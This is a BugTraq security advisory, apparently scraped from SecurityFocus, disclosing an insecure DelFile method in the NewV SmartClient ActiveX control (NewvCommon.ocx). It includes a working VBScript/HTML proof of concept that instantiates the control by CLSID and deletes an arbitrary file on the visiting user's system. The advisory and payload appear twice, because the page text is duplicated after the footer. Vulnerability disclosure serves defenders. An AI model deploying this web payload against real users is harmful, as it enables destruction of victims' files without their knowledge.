BugTraq
Back to list
|
Post reply
NewvCommon.ocx ActiveX Insecure Method Vulnerability
Jan 10 2011 02:27PM
wsn1983 gmail com
NewvCommon.ocx ActiveX Insecure Method Vulnerability
========
Vulnerable:All Version
Vendor:www.newv.com.cn
Details:
========
A Insecure method vulnerability has been found in NewV SmartClient.
The specific flaw exists within the DelFile method of the Newv ActiveX control (NewvCommon.ocx).
The DelFile method does not handle user's input exactly that can be used to delete arbitrary files on users system.
POC:
========
Function DelFile (
ByVal FilePath As Variant
) As String
<html>
<head>
<script language='vbscript'>
arg1 = "c:\\test.txt"
</script>
</head>
<object classid='clsid:0B68B7EB-02FF-4A41-BC14-3C303BB853F9' id='target' />
</object>
<script language='vbscript'>
target.DelFile arg1
</script>
</html>
Timeline:
========
2010.10.23 Report to vendor,no response.
2011.01.10 Public
Reference:
========
http://www.newv.com.cn
http://demo.newv.com.cn/lds/module/smartclientsetting.exe
http://www.nansec.com
[ reply ]
Privacy Statement
Copyright 2010, SecurityFocus
========
Vulnerable:All Version
Vendor:www.newv.com.cn
Details:
========
A Insecure method vulnerability has been found in NewV SmartClient.
The specific flaw exists within the DelFile method of the Newv ActiveX control (NewvCommon.ocx).
The DelFile method does not handle user's input exactly that can be used to delete arbitrary files on users system.
POC:
========
Function DelFile (
ByVal FilePath As Variant
) As String
<html>
<head>
<script language='vbscript'>
arg1 = "c:\\test.txt"
</script>
</head>
<object classid='clsid:0B68B7EB-02FF-4A41-BC14-3C303BB853F9' id='target' />
</object>
<script language='vbscript'>
target.DelFile arg1
</script>
</html>
Timeline:
========
2010.10.23 Report to vendor,no response.
2011.01.10 Public
Reference:
========
http://www.newv.com.cn
http://demo.newv.com.cn/lds/module/smartclientsetting.exe
http://www.nansec.com
[ reply ]